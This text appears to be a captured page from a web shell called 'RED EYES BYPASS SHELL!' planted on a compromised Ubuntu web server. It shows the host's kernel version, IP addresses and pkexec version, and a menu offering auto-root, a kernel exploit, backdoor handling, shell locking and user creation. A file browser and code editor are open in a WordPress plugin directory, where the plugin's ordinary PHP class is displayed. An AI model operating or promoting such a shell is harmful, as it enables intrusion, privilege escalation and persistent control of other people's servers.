Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
lottier-divi /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
modules
[ DIR ]
drwxr-xr-x
Lottier.php
1.4
KB
-rwxr-xr-x
loader.js
202
B
-rwxr-xr-x
loader.php
335
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Lottier.php
<?php /** * Lottie animations in just a few clicks without writing a single line of code. * Exclusively on Envato Market: https://1.envato.market/lottierdivi * * @encoding UTF-8 * @version 1.0.1 * @copyright Copyright (C) 2018 - 2022 Merkulove ( https://merkulov.design/ ). All rights reserved. * @license Envato License https://1.envato.market/KYbje * @contributors Nemirovskiy Vitaliy (nemirovskiyvitaliy@gmail.com) * @support help@merkulov.design **/ /** Exit if accessed directly. */ if ( ! defined( 'ABSPATH' ) ) { header( 'Status: 403 Forbidden' ); header( 'HTTP/1.1 403 Forbidden' ); exit; } class Lottier extends DiviExtension { /** * The gettext domain for the extension's translations. * * @since 1.0.0 * * @var string */ public $gettext_domain = 'mdp-lottier-divi'; /** * The extension's WP Plugin name. * * @since 1.0.0 * * @var string */ public $name = 'mdplottier-divi'; /** * The extension's version * * @since 1.0.0 * * @var string */ public $version = '1.0.0'; /** * MDP_MyExtension constructor. * * @param string $name * @param array $args */ public function __construct( $name = 'mdplottier-divi', $args = array() ) { $this->plugin_dir = plugin_dir_path( __FILE__ ); $this->plugin_dir_url = plugin_dir_url( $this->plugin_dir ); parent::__construct( $name, $args ); } } new Lottier;
Close